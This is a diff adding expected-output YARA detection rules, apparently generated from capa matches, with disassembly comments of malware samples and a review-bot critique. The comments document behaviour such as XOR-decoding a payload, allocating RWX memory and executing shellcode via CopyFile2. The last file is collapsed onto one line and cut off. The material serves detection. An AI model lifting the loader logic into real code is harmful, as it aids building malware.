+ .text:0x0040408a 8b542418 mov edx,dword [esp + 24]
+ .text:0x0040408e 33c0 xor eax,eax
+ .text:0x00404090 45 inc ebp
+ .text:0x00404091 83c728 add edi,40
+ .text:0x00404094 8b1a mov ebx,dword [edx]
+ .text:0x00404096 668b4306 mov ax,word [ebx + 6]
+ .text:0x0040409a 3be8 cmp ebp,eax
+ .text:0x0040409c 0f8c72ffffff jl 0x00404014
+ .text:0x004040a2 5f pop edi
+ .text:0x004040a3 5e pop esi
+ .text:0x004040a4 loc_004040a4: [1 XREFS]
+ .text:0x004040a4 5d pop ebp
+ .text:0x004040a5 5b pop ebx
+ .text:0x004040a6 59 pop ecx
+ .text:0x004040a7 c3 ret
+ */
+ $c48 = { 51 8B 44 24 ?? 53 33 C9 55 8B 18 33 ED 66 8B 4B ?? 66 39 6B ?? 8D 44 19 ?? 0F 86 ?? ?? ?? ?? 56 57 8D 78 ?? 8B 07 8B C8 8B D0 C1 E9 1D C1 EA 1E 8B F0 83 E1 01 83 E2 01 C1 EE 1F A9 00 00 00 02 74 ?? 8B 57 ?? 8B 47 ?? 68 00 40 00 00 52 50 FF 15 ?? ?? ?? ?? EB ?? 8D 0C 4A A9 00 00 00 04 8D 14 4E 8B 14 95 ?? ?? ?? ?? 74 ?? 80 CE 02 8B 4F ?? 85 C9 75 ?? A8 40 74 ?? 8B 4B ?? EB ?? A8 80 74 ?? 8B 4B ?? 85 C9 76 ?? 8D 44 24 ?? 50 52 51 8B 4F ?? 51 FF 15 ?? ?? ?? ?? 8B 54 24 ?? 33 C0 45 83 C7 28 8B 1A 66 8B 43 ?? 3B E8 0F 8C ?? ?? ?? ?? 5F 5E 5D 5B 59 C3 }
+ /*
+function at 0x00403dd0@9324d1a8ae37a36ae560c37448c9705a with 1 features:
+ - parse PE header
+ .text:0x00403dd0
+ .text:0x00403dd0 FUNC: int cdecl sub_00403dd0( int arg0, ) [2 XREFS]
+ .text:0x00403dd0
+ .text:0x00403dd0 Stack Variables: (offset from initial top of stack)
+ .text:0x00403dd0 4: int arg0
+ .text:0x00403dd0
+ .text:0x00403dd0 53 push ebx
+ .text:0x00403dd1 55 push ebp
+ .text:0x00403dd2 8b6c240c mov ebp,dword [esp + 12]
+ .text:0x00403dd6 56 push esi
+ .text:0x00403dd7 57 push edi
+ .text:0x00403dd8 c645004d mov byte [ebp],77
+ .text:0x00403ddc c645015a mov byte [ebp + 1],90
+ .text:0x00403de0 66817d004d5a cmp word [ebp],0x00005a4d
+ .text:0x00403de6 7407 jz 0x00403def
+ .text:0x00403de8 5f pop edi
+ .text:0x00403de9 5e pop esi
+ .text:0x00403dea 5d pop ebp
+ .text:0x00403deb 33c0 xor eax,eax
+ .text:0x00403ded 5b pop ebx
+ .text:0x00403dee c3 ret
+ .text:0x00403def loc_00403def: [1 XREFS]
+ .text:0x00403def 8b5d3c mov ebx,dword [ebp + 60]
+ .text:0x00403df2 03dd add ebx,ebp
+ .text:0x00403df4 813b50450000 cmp dword [ebx],0x00004550
+ .text:0x00403dfa 7407 jz 0x00403e03
+ .text:0x00403dfc 5f pop edi
+ .text:0x00403dfd 5e pop esi
+ .text:0x00403dfe 5d pop ebp
+ .text:0x00403dff 33c0 xor eax,eax
+ .text:0x00403e01 5b pop ebx
+ .text:0x00403e02 c3 ret
+ .text:0x00403e03 loc_00403e03: [1 XREFS]
+ .text:0x00403e03 8b4350 mov eax,dword [ebx + 80]
+ .text:0x00403e06 8b4b34 mov ecx,dword [ebx + 52]
+ .text:0x00403e09 8b3580904000 mov esi,dword [0x00409080]
+ .text:0x00403e0f 6a04 push 4
+ .text:0x00403e11 6800200000 push 0x00002000
+ .text:0x00403e16 50 push eax
+ .text:0x00403e17 51 push ecx
+ .text:0x00403e18 ffd6 call esi ;kernel32.VirtualAlloc(0x61616161,0x61616161,0x00002000,4)
+ .text:0x00403e1a 8bf8 mov edi,eax
+ .text:0x00403e1c 85ff test edi,edi
+ .text:0x00403e1e 7519 jnz 0x00403e39
+ .text:0x00403e20 8b5350 mov edx,dword [ebx + 80]
+ .text:0x00403e23 6a04 push 4
+ .text:0x00403e25 6800200000 push 0x00002000
+ .text:0x00403e2a 52 push edx
+ .text:0x00403e2b 50 push eax
+ .text:0x00403e2c ffd6 call esi ;kernel32.VirtualAlloc(<0x00403e18>,0x61616161,0x00002000,4)
+ .text:0x00403e2e 8bf8 mov edi,eax
+ .text:0x00403e30 85ff test edi,edi
+ .text:0x00403e32 7505 jnz 0x00403e39
+ .text:0x00403e34 5f pop edi
+ .text:0x00403e35 5e pop esi
+ .text:0x00403e36 5d pop ebp
+ .text:0x00403e37 5b pop ebx
+ .text:0x00403e38 c3 ret
+ .text:0x00403e39 loc_00403e39: [2 XREFS]
+ .text:0x00403e39 6a14 push 20
+ .text:0x00403e3b 6a00 push 0
+ .text:0x00403e3d ff15e0904000 call dword [0x004090e0] ;kernel32.GetProcessHeap()
+ .text:0x00403e43 50 push eax
+ .text:0x00403e44 ff15dc904000 call dword [0x004090dc] ;ntdll.RtlAllocateHeap(kernel32.GetProcessHeap(),0,20)
+ .text:0x00403e4a 8bf0 mov esi,eax
+ .text:0x00403e4c 33c0 xor eax,eax
+ .text:0x00403e4e 6a04 push 4
+ .text:0x00403e50 6800100000 push 0x00001000
+ .text:0x00403e55 897e04 mov dword [esi + 4],edi
+ .text:0x00403e58 89460c mov dword [esi + 12],eax
+ .text:0x00403e5b 894608 mov dword [esi + 8],eax
+ .text:0x00403e5e 894610 mov dword [esi + 16],eax
+ .text:0x00403e61 8b4350 mov eax,dword [ebx + 80]
+ .text:0x00403e64 50 push eax
+ .text:0x00403e65 57 push edi
+ .text:0x00403e66 ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(kernel32.VirtualAlloc(0x61616161,0x61616161,0x00002000,4),0x61616161,0x00001000,4)
+ .text:0x00403e6c 8b4b54 mov ecx,dword [ebx + 84]
+ .text:0x00403e6f 6a04 push 4
+ .text:0x00403e71 6800100000 push 0x00001000
+ .text:0x00403e76 51 push ecx
+ .text:0x00403e77 57 push edi
+ .text:0x00403e78 ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(<0x00403e18>,0x61616161,0x00001000,4)
+ .text:0x00403e7e 8b553c mov edx,dword [ebp + 60]
+ .text:0x00403e81 8b4b54 mov ecx,dword [ebx + 84]
+ .text:0x00403e84 03d1 add edx,ecx
+ .text:0x00403e86 8b0dd4aa4000 mov ecx,dword [0x0040aad4]
+ .text:0x00403e8c 52 push edx
+ .text:0x00403e8d 55 push ebp
+ .text:0x00403e8e 50 push eax
+ .text:0x00403e8f 89442420 mov dword [esp + 32],eax
+ .text:0x00403e93 e8c8060000 call 0x00404560 ;sub_00404560(kernel32.VirtualAlloc(<0x00403e18>,0x61616161,0x00001000,4),arg0,0xc2c2c2c2)
+ .text:0x00403e98 8b453c mov eax,dword [ebp + 60]
+ .text:0x00403e9b 8b4c2414 mov ecx,dword [esp + 20]
+ .text:0x00403e9f 03c1 add eax,ecx
+ .text:0x00403ea1 56 push esi
+ .text:0x00403ea2 53 push ebx
+ .text:0x00403ea3 8906 mov dword [esi],eax
+ .text:0x00403ea5 55 push ebp
+ .text:0x00403ea6 897834 mov dword [eax + 52],edi
+ .text:0x00403ea9 e872000000 call 0x00403f20 ;sub_00403f20(arg0,0xa2b87170,kernel32.HeapAlloc(<0x00403e3d>,0,20))
+ .text:0x00403eae 8b4b34 mov ecx,dword [ebx + 52]
+ .text:0x00403eb1 8bc7 mov eax,edi
+ .text:0x00403eb3 83c40c add esp,12
+ .text:0x00403eb6 2bc1 sub eax,ecx
+ .text:0x00403eb8 740a jz 0x00403ec4
+ .text:0x00403eba 50 push eax
+ .text:0x00403ebb 56 push esi
+ .text:0x00403ebc e8ef010000 call 0x004040b0 ;sub_004040b0(<0x00403e44>,0xdff82eae)
+ .text:0x00403ec1 83c408 add esp,8
+ .text:0x00403ec4 loc_00403ec4: [1 XREFS]
+ .text:0x00403ec4 56 push esi
+ .text:0x00403ec5 e866020000 call 0x00404130 ;sub_00404130(<0x00403e44>)
+ .text:0x00403eca 83c404 add esp,4
+ .text:0x00403ecd 85c0 test eax,eax
+ .text:0x00403ecf 7423 jz 0x00403ef4
+ .text:0x00403ed1 56 push esi
+ .text:0x00403ed2 e819010000 call 0x00403ff0 ;sub_00403ff0(<0x00403e44>)
+ .text:0x00403ed7 8b16 mov edx,dword [esi]
+ .text:0x00403ed9 83c404 add esp,4
+ .text:0x00403edc 8b4228 mov eax,dword [edx + 40]
+ .text:0x00403edf 85c0 test eax,eax
+ .text:0x00403ee1 7428 jz 0x00403f0b
+ .text:0x00403ee3 03c7 add eax,edi
+ .text:0x00403ee5 85c0 test eax,eax
+ .text:0x00403ee7 740b jz 0x00403ef4
+ .text:0x00403ee9 6a00 push 0
+ .text:0x00403eeb 6a01 push 1
+ .text:0x00403eed 57 push edi
+ .text:0x00403eee ffd0 call eax ;UnknownApi()
+ .text:0x00403ef0 85c0 test eax,eax
+ .text:0x00403ef2 7510 jnz 0x00403f04
+ .text:0x00403ef4 loc_00403ef4: [2 XREFS]
+ .text:0x00403ef4 56 push esi
+ .text:0x00403ef5 e8e6030000 call 0x004042e0 ;sub_004042e0(<0x00403e44>)
+ .text:0x00403efa 83c404 add esp,4
+ .text:0x00403efd 33c0 xor eax,eax
+ .text:0x00403eff 5f pop edi
+ .text:0x00403f00 5e pop esi
+ .text:0x00403f01 5d pop ebp
+ .text:0x00403f02 5b pop ebx
+ .text:0x00403f03 c3 ret
+ .text:0x00403f04 loc_00403f04: [1 XREFS]
+ .text:0x00403f04 c7461001000000 mov dword [esi + 16],1
+ .text:0x00403f0b loc_00403f0b: [1 XREFS]
+ .text:0x00403f0b 8bc6 mov eax,esi
+ .text:0x00403f0d 5f pop edi
+ .text:0x00403f0e 5e pop esi
+ .text:0x00403f0f 5d pop ebp
+ .text:0x00403f10 5b pop ebx
+ .text:0x00403f11 c3 ret
+ */
+ $c49 = { 53 55 8B 6C 24 ?? 56 57 C6 45 ?? 4D C6 45 ?? 5A 66 81 7D ?? 4D 5A 74 ?? 5F 5E 5D 33 C0 5B C3 8B 5D ?? 03 DD 81 3B 50 45 00 00 74 ?? 5F 5E 5D 33 C0 5B C3 8B 43 ?? 8B 4B ?? 8B 35 ?? ?? ?? ?? 6A 04 68 00 20 00 00 50 51 FF D6 8B F8 85 FF 75 ?? 8B 53 ?? 6A 04 68 00 20 00 00 52 50 FF D6 8B F8 85 FF 75 ?? 5F 5E 5D 5B C3 6A 14 6A 00 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 33 C0 6A 04 68 00 10 00 00 89 7E ?? 89 46 ?? 89 46 ?? 89 46 ?? 8B 43 ?? 50 57 FF 15 ?? ?? ?? ?? 8B 4B ?? 6A 04 68 00 10 00 00 51 57 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4B ?? 03 D1 8B 0D ?? ?? ?? ?? 52 55 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 4C 24 ?? 03 C1 56 53 89 06 55 89 78 ?? E8 ?? ?? ?? ?? 8B 4B ?? 8B C7 83 C4 0C 2B C1 74 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 08 56 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 16 83 C4 04 8B 42 ?? 85 C0 74 ?? 03 C7 85 C0 74 ?? 6A 00 6A 01 57 FF D0 85 C0 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 04 33 C0 5F 5E 5D 5B C3 C7 46 ?? 01 00 00 00 8B C6 5F 5E 5D 5B C3 }
+ condition:
+ all of them
+}
+
diff --git a/yara/expected_c2bb17c12975e.yar b/yara/expected_c2bb17c12975e.yar
new file mode 100644
index 0000000..14b62a1
--- /dev/null
+++ b/yara/expected_c2bb17c12975e.yar
@@ -0,0 +1,201 @@
+rule super_rule_50580
+{
+ meta:
+ author = "CAPA Matches"
+ date_created = "2023-08-10"
+ date_modified = "2023-08-10"
+ description = ""
+ md5 = "50580ef0b882905316c4569162ea07d9"
+ strings:
+ /*
+Basic Block at 0x140001040@50580ef0b882905316c4569162ea07d9 with 1 features:
+ - encode data using XOR
+ .text:0x140001040 loc_140001040: [1 XREFS]
+ .text:0x140001040 f30f6f0439 movdqu xmm0,oword [rcx + rdi]
+ .text:0x140001045 660fefc2 pxor xmm0,xmm2
+ .text:0x140001049 f30f7f0439 movdqu oword [rcx + rdi],xmm0
+ .text:0x14000104e f30f6f4c3910 movdqu xmm1,oword [rcx + rdi + 16]
+ .text:0x140001054 660fefca pxor xmm1,xmm2
+ .text:0x140001058 f30f7f4c3910 movdqu oword [rcx + rdi + 16],xmm1
+ .text:0x14000105e f30f6f443920 movdqu xmm0,oword [rcx + rdi + 32]
+ .text:0x140001064 660fefc2 pxor xmm0,xmm2
+ .text:0x140001068 f30f7f443920 movdqu oword [rcx + rdi + 32],xmm0
+ .text:0x14000106e f30f6f443930 movdqu xmm0,oword [rcx + rdi + 48]
+ .text:0x140001074 660fefc2 pxor xmm0,xmm2
+ .text:0x140001078 f30f7f443930 movdqu oword [rcx + rdi + 48],xmm0
+ .text:0x14000107e 4883c140 add rcx,64
+ .text:0x140001082 483bc8 cmp rcx,rax
+ .text:0x140001085 7cb9 jl 0x140001040
+ */
+ $c0 = { F3 0F 6F 04 39 66 0F EF C2 F3 0F 7F 04 39 F3 0F 6F 4C 39 ?? 66 0F EF CA F3 0F 7F 4C 39 ?? F3 0F 6F 44 39 ?? 66 0F EF C2 F3 0F 7F 44 39 ?? F3 0F 6F 44 39 ?? 66 0F EF C2 F3 0F 7F 44 39 ?? 48 83 C1 40 48 3B C8 7C ?? }
+ /*
+Basic Block at 0x140001090@50580ef0b882905316c4569162ea07d9 with 1 features:
+ - encode data using XOR
+ .text:0x140001090 loc_140001090: [1 XREFS]
+ .text:0x140001090 80343862 xor byte [rax + rdi],98
+ .text:0x140001094 48ffc0 inc rax
+ .text:0x140001097 483d1f030000 cmp rax,799
+ .text:0x14000109d 7cf1 jl 0x140001090
+ */
+ $c1 = { 80 34 38 62 48 FF C0 48 3D 1F 03 00 00 7C ?? }
+ /*
+Basic Block at 0x14000109f@50580ef0b882905316c4569162ea07d9 with 1 features:
+ - allocate RWX memory
+ .text:0x14000109f 33c9 xor ecx,ecx
+ .text:0x1400010a1 ba1f030000 mov edx,799
+ .text:0x1400010a6 41b800100000 mov r8d,0x00001000
+ .text:0x1400010ac 448d4940 lea r9d,dword [rcx + 64]
+ .text:0x1400010b0 ff154a0f0000 call qword [rip + 3914] ;kernel32.VirtualAlloc(0,799,0x00001000,64)
+ .text:0x1400010b6 41b81f030000 mov r8d,799
+ .text:0x1400010bc 488bd7 mov rdx,rdi
+ .text:0x1400010bf 488bc8 mov rcx,rax
+ .text:0x1400010c2 488bd8 mov rbx,rax
+ .text:0x1400010c5 e8650d0000 call 0x140001e2f ;memmove_140001e2f()
+ .text:0x1400010ca 488d0d7f110000 lea rcx,qword [rip + 4479]
+ .text:0x1400010d1 c744242020000000 mov dword [rsp + 32],32
+ .text:0x1400010d9 c744242401000000 mov dword [rsp + 36],1
+ .text:0x1400010e1 48c7442428000000 mov qword [rsp + 40],0
+ .text:0x1400010ea 48895c2430 mov qword [rsp + 48],rbx
+ .text:0x1400010ef 48c7442438000000 mov qword [rsp + 56],0
+ .text:0x1400010f8 ff150a0f0000 call qword [rip + 3850] ;kernel32.DeleteFileW(0x140002250)
+ .text:0x1400010fe 4c8d442420 lea r8,qword [rsp + 32]
+ .text:0x140001103 488d1546110000 lea rdx,qword [rip + 4422]
+ .text:0x14000110a 488d0d77110000 lea rcx,qword [rip + 4471]
+ .text:0x140001111 ff15f90e0000 call qword [rip + 3833] ;UnknownApi()
+ .text:0x140001117 33c0 xor eax,eax
+ .text:0x140001119 488b4c2440 mov rcx,qword [rsp + 64]
+ .text:0x14000111e 4833cc xor rcx,rsp
+ .text:0x140001121 e82a000000 call 0x140001150 ;__security_check_cookie(0x2b992ddfa232)
+ .text:0x140001126 488b5c2460 mov rbx,qword [rsp + 96]
+ .text:0x14000112b 4883c450 add rsp,80
+ .text:0x14000112f 5f pop rdi
+ .text:0x140001130 c3 ret
+ */
+ $c2 = { 33 C9 BA 1F 03 00 00 41 B8 00 10 00 00 44 8D 49 ?? FF 15 ?? ?? ?? ?? 41 B8 1F 03 00 00 48 8B D7 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? C7 44 24 ?? 20 00 00 00 C7 44 24 ?? 01 00 00 00 48 C7 44 24 ?? 00 00 00 00 48 89 5C 24 ?? 48 C7 44 24 ?? 00 00 00 00 FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 C4 50 5F C3 }
+ /*
+function at 0x140001010@50580ef0b882905316c4569162ea07d9 with 3 features:
+ - copy file
+ - delete file
+ - execute shellcode via CopyFile2
+ .text:0x140001010
+ .text:0x140001010 FUNC: int msx64call sub_140001010( ) [2 XREFS]
+ .text:0x140001010
+ .text:0x140001010 Stack Variables: (offset from initial top of stack)
+ .text:0x140001010 32: void * shadow3
+ .text:0x140001010 24: void * shadow2
+ .text:0x140001010 16: void * shadow1
+ .text:0x140001010 8: void * shadow0
+ .text:0x140001010 -24: int local24
+ .text:0x140001010 -32: int local32
+ .text:0x140001010 -40: int local40
+ .text:0x140001010 -48: int local48
+ .text:0x140001010 -52: int local52
+ .text:0x140001010 -56: int local56
+ .text:0x140001010
+ .text:0x140001010 48895c2408 mov qword [rsp + 8],rbx
+ .text:0x140001015 57 push rdi
+ .text:0x140001016 4883ec50 sub rsp,80
+ .text:0x14000101a 488b05df1f0000 mov rax,qword [rip + 8159]
+ .text:0x140001021 4833c4 xor rax,rsp
+ .text:0x140001024 4889442440 mov qword [rsp + 64],rax
+ .text:0x140001029 660f6f158f120000 movdqa xmm2,oword [rip + 4751]
+ .text:0x140001031 488d3d08200000 lea rdi,qword [rip + 8200]
+ .text:0x140001038 33c9 xor ecx,ecx
+ .text:0x14000103a b800030000 mov eax,768
+ .text:0x14000103f 90 nop
+ .text:0x140001040 loc_140001040: [1 XREFS]
+ .text:0x140001040 f30f6f0439 movdqu xmm0,oword [rcx + rdi]
+ .text:0x140001045 660fefc2 pxor xmm0,xmm2
+ .text:0x140001049 f30f7f0439 movdqu oword [rcx + rdi],xmm0
+ .text:0x14000104e f30f6f4c3910 movdqu xmm1,oword [rcx + rdi + 16]
+ .text:0x140001054 660fefca pxor xmm1,xmm2
+ .text:0x140001058 f30f7f4c3910 movdqu oword [rcx + rdi + 16],xmm1
+ .text:0x14000105e f30f6f443920 movdqu xmm0,oword [rcx + rdi + 32]
+ .text:0x140001064 660fefc2 pxor xmm0,xmm2
+ .text:0x140001068 f30f7f443920 movdqu oword [rcx + rdi + 32],xmm0
+ .text:0x14000106e f30f6f443930 movdqu xmm0,oword [rcx + rdi + 48]
+ .text:0x140001074 660fefc2 pxor xmm0,xmm2
+ .text:0x140001078 f30f7f443930 movdqu oword [rcx + rdi + 48],xmm0
+ .text:0x14000107e 4883c140 add rcx,64
+ .text:0x140001082 483bc8 cmp rcx,rax
+ .text:0x140001085 7cb9 jl 0x140001040
+ .text:0x140001087 660f1f8400000000 nop word [rax + rax]
+ .text:0x140001090 loc_140001090: [1 XREFS]
+ .text:0x140001090 80343862 xor byte [rax + rdi],98
+ .text:0x140001094 48ffc0 inc rax
+ .text:0x140001097 483d1f030000 cmp rax,799
+ .text:0x14000109d 7cf1 jl 0x140001090
+ .text:0x14000109f 33c9 xor ecx,ecx
+ .text:0x1400010a1 ba1f030000 mov edx,799
+ .text:0x1400010a6 41b800100000 mov r8d,0x00001000
+ .text:0x1400010ac 448d4940 lea r9d,dword [rcx + 64]
+ .text:0x1400010b0 ff154a0f0000 call qword [rip + 3914] ;kernel32.VirtualAlloc(0,799,0x00001000,64)
+ .text:0x1400010b6 41b81f030000 mov r8d,799
+ .text:0x1400010bc 488bd7 mov rdx,rdi
+ .text:0x1400010bf 488bc8 mov rcx,rax
+ .text:0x1400010c2 488bd8 mov rbx,rax
+ .text:0x1400010c5 e8650d0000 call 0x140001e2f ;memmove_140001e2f()
+ .text:0x1400010ca 488d0d7f110000 lea rcx,qword [rip + 4479]
+ .text:0x1400010d1 c744242020000000 mov dword [rsp + 32],32
+ .text:0x1400010d9 c744242401000000 mov dword [rsp + 36],1
+ .text:0x1400010e1 48c7442428000000 mov qword [rsp + 40],0
+ .text:0x1400010ea 48895c2430 mov qword [rsp + 48],rbx
+ .text:0x1400010ef 48c7442438000000 mov qword [rsp + 56],0
+ .text:0x1400010f8 ff150a0f0000 call qword [rip + 3850] ;kernel32.DeleteFileW(0x140002250)
+ .text:0x1400010fe 4c8d442420 lea r8,qword [rsp + 32]
+ .text:0x140001103 488d1546110000 lea rdx,qword [rip + 4422]
+ .text:0x14000110a 488d0d77110000 lea rcx,qword [rip + 4471]
+ .text:0x140001111 ff15f90e0000 call qword [rip + 3833] ;UnknownApi()
+ .text:0x140001117 33c0 xor eax,eax
+ .text:0x140001119 488b4c2440 mov rcx,qword [rsp + 64]
+ .text:0x14000111e 4833cc xor rcx,rsp
+ .text:0x140001121 e82a000000 call 0x140001150 ;__security_check_cookie(0x2b992ddfa232)
+ .text:0x140001126 488b5c2460 mov rbx,qword [rsp + 96]
+ .text:0x14000112b 4883c450 add rsp,80
+ .text:0x14000112f 5f pop rdi
+ .text:0x140001130 c3 ret
+ */
+ $c3 = { 48 89 5C 24 ?? 57 48 83 EC 50 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 66 0F 6F 15 ?? ?? 00 00 48 8D 3D ?? ?? ?? ?? 33 C9 B8 00 03 00 00 90 F3 0F 6F 04 39 66 0F EF C2 F3 0F 7F 04 39 F3 0F 6F 4C 39 ?? 66 0F EF CA F3 0F 7F 4C 39 ?? F3 0F 6F 44 39 ?? 66 0F EF C2 F3 0F 7F 44 39 ?? F3 0F 6F 44 39 ?? 66 0F EF C2 F3 0F 7F 44 39 ?? 48 83 C1 40 48 3B C8 7C ?? 66 0F 1F 84 00 ?? ?? 00 00 80 34 38 62 48 FF C0 48 3D 1F 03 00 00 7C ?? 33 C9 BA 1F 03 00 00 41 B8 00 10 00 00 44 8D 49 ?? FF 15 ?? ?? ?? ?? 41 B8 1F 03 00 00 48 8B D7 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? C7 44 24 ?? 20 00 00 00 C7 44 24 ?? 01 00 00 00 48 C7 44 24 ?? 00 00 00 00 48 89 5C 24 ?? 48 C7 44 24 ?? 00 00 00 00 FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 C4 50 5F C3 }
+ /*
+function at 0x140001a24@50580ef0b882905316c4569162ea07d9 with 1 features:
+ - parse PE header
+ .text:0x140001a24
+ .text:0x140001a24 FUNC: int msx64call sub_140001a24( ) [2 XREFS]
+ .text:0x140001a24
+ .text:0x140001a24 Stack Variables: (offset from initial top of stack)
+ .text:0x140001a24 32: void * shadow3
+ .text:0x140001a24 24: void * shadow2
+ .text:0x140001a24 16: void * shadow1
+ .text:0x140001a24 8: void * shadow0
+ .text:0x140001a24
+ .text:0x140001a24 4883ec28 sub rsp,40
+ .text:0x140001a28 33c9 xor ecx,ecx
+ .text:0x140001a2a ff1518060000 call qword [rip + 1560] ;kernel32.GetModuleHandleW(0)
+ .text:0x140001a30 4885c0 test rax,rax
+ .text:0x140001a33 7439 jz 0x140001a6e
+ .text:0x140001a35 b94d5a0000 mov ecx,0x00005a4d
+ .text:0x140001a3a 663908 cmp word [rax],cx
+ .text:0x140001a3d 752f jnz 0x140001a6e
+ .text:0x140001a3f 4863483c movsxd rcx,dword [rax + 60]
+ .text:0x140001a43 4803c8 add rcx,rax
+ .text:0x140001a46 813950450000 cmp dword [rcx],0x00004550
+ .text:0x140001a4c 7520 jnz 0x140001a6e
+ .text:0x140001a4e b80b020000 mov eax,523
+ .text:0x140001a53 66394118 cmp word [rcx + 24],ax
+ .text:0x140001a57 7515 jnz 0x140001a6e
+ .text:0x140001a59 83b9840000000e cmp dword [rcx + 132],14
+ .text:0x140001a60 760c jbe 0x140001a6e
+ .text:0x140001a62 83b9f800000000 cmp dword [rcx + 248],0
+ .text:0x140001a69 0f95c0 setnz al
+ .text:0x140001a6c eb02 jmp 0x140001a70
+ .text:0x140001a6e loc_140001a6e: [5 XREFS]
+ .text:0x140001a6e 32c0 xor al,al
+ .text:0x140001a70 loc_140001a70: [1 XREFS]
+ .text:0x140001a70 4883c428 add rsp,40
+ .text:0x140001a74 c3 ret
+ */
+ $c4 = { 48 83 EC 28 33 C9 FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? B9 4D 5A 00 00 66 39 08 75 ?? 48 63 48 ?? 48 03 C8 81 39 50 45 00 00 75 ?? B8 0B 02 00 00 66 39 41 ?? 75 ?? 83 B9 ?? ?? ?? ?? 0E 76 ?? 83 B9 ?? ?? ?? ?? 00 0F 95 C0 EB ?? 32 C0 48 83 C4 28 C3 }
+ condition:
+ all of them
+}
+
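Review bot: The fixture's file name `expected_c2bb17c12975e.yar` does not match the `md5` meta the rule carries (`50580ef0b882905316c4569162ea07d9`), so if the name is meant to identify the sample it will mislead whoever debugs a failing comparison; if the pairing is intentional, the test that loads it should say so. Separately, `$c0`, `$c1` and `$c2` are byte-for-byte substrings of `$c3` (the function at 0x140001010 contains all three basic blocks), so under `condition: all of them` they add no selectivity and only cost scan work; if the generator is meant to emit per-basic-block strings this is fine as an expected-output fixture, otherwise consider having it emit only the function-level string or a condition such as `$c3 or ($c0 and $c1 and $c2)`. The `description = ""` meta is empty, while the matched capability names (`encode data using XOR`, `allocate RWX memory`, `parse PE header`) are already in the comments and could be joined into it by the generator.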
diff --git a/yara/expected_pma_01-01.exe_01-02.exe b/yara/expected_pma_01-01.exe_01-02.exe
new file mode 100644
index 0000000..21355c7
--- /dev/null
+++ b/yara/expected_pma_01-01.exe_01-02.exe
@@ -0,0 +1,840 @@ +rule super_rule_bb742 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "bb7425b82141a1c0f7d60e5106676bb1" + strings: + /* +function at 0x00401440@bb7425b82141a1c0f7d60e5106676bb1 with 3 features: + - copy file + - read file via mapping + - resolve function by parsing PE exports + .text:0x00401440 + .text:0x00401440 FUNC: int cdecl sub_00401440( int arg0, int arg1, ) [2 XREFS] + .text:0x00401440 + .text:0x00401440 Stack Variables: (offset from initial top of stack) + .text:0x00401440 8: int arg1 + .text:0x00401440 4: int arg0 + .text:0x00401440 -4: int local4 + .text:0x00401440 -8: int local8 + .text:0x00401440 -12: int local12 + .text:0x00401440 -16: int local16 + .text:0x00401440 -20: int local20 + .text:0x00401440 -24: int local24 + .text:0x00401440 -28: int local28 + .text:0x00401440 -32: int local32 + .text:0x00401440 -36: int local36 + .text:0x00401440 -40: int local40 + .text:0x00401440 -44: int local44 + .text:0x00401440 -48: int local48 + .text:0x00401440 -52: int local52 + .text:0x00401440 -56: int local56 + .text:0x00401440 -60: int local60 + .text:0x00401440 -64: int local64 + .text:0x00401440 -68: int local68 + .text:0x00401440 + .text:0x00401440 8b442404 mov eax,dword [esp + 4] + .text:0x00401444 83ec44 sub esp,68 + .text:0x00401447 83f802 cmp eax,2 + .text:0x0040144a 53 push ebx + .text:0x0040144b 55 push ebp + .text:0x0040144c 56 push esi + .text:0x0040144d 57 push edi + .text:0x0040144e 0f85bf030000 jnz 0x00401813 + .text:0x00401454 8b44245c mov eax,dword [esp + 92] + .text:0x00401458 beb0304000 mov esi,0x004030b0 + .text:0x0040145d 8b4004 mov eax,dword [eax + 4] + .text:0x00401460 loc_00401460: [1 XREFS] + .text:0x00401460 8a10 mov dl,byte [eax] + .text:0x00401462 8a1e mov bl,byte [esi] + .text:0x00401464 8aca mov cl,dl + .text:0x00401466 3ad3 cmp dl,bl + .text:0x00401468 751e jnz 0x00401488 + .text:0x0040146a 84c9 test cl,cl + .text:0x0040146c 7416 jz 
0x00401484 + .text:0x0040146e 8a5001 mov dl,byte [eax + 1] + .text:0x00401471 8a5e01 mov bl,byte [esi + 1] + .text:0x00401474 8aca mov cl,dl + .text:0x00401476 3ad3 cmp dl,bl + .text:0x00401478 750e jnz 0x00401488 + .text:0x0040147a 83c002 add eax,2 + .text:0x0040147d 83c602 add esi,2 + .text:0x00401480 84c9 test cl,cl + .text:0x00401482 75dc jnz 0x00401460 + .text:0x00401484 loc_00401484: [1 XREFS] + .text:0x00401484 33c0 xor eax,eax + .text:0x00401486 eb05 jmp 0x0040148d + .text:0x00401488 loc_00401488: [2 XREFS] + .text:0x00401488 1bc0 sbb eax,eax + .text:0x0040148a 83d8ff sbb eax,0xffffffff + .text:0x0040148d loc_0040148d: [1 XREFS] + .text:0x0040148d 85c0 test eax,eax + .text:0x0040148f 0f857e030000 jnz 0x00401813 + .text:0x00401495 8b3d14204000 mov edi,dword [0x00402014] + .text:0x0040149b 50 push eax + .text:0x0040149c 50 push eax + .text:0x0040149d 6a03 push 3 + .text:0x0040149f 50 push eax + .text:0x004014a0 6a01 push 1 + .text:0x004014a2 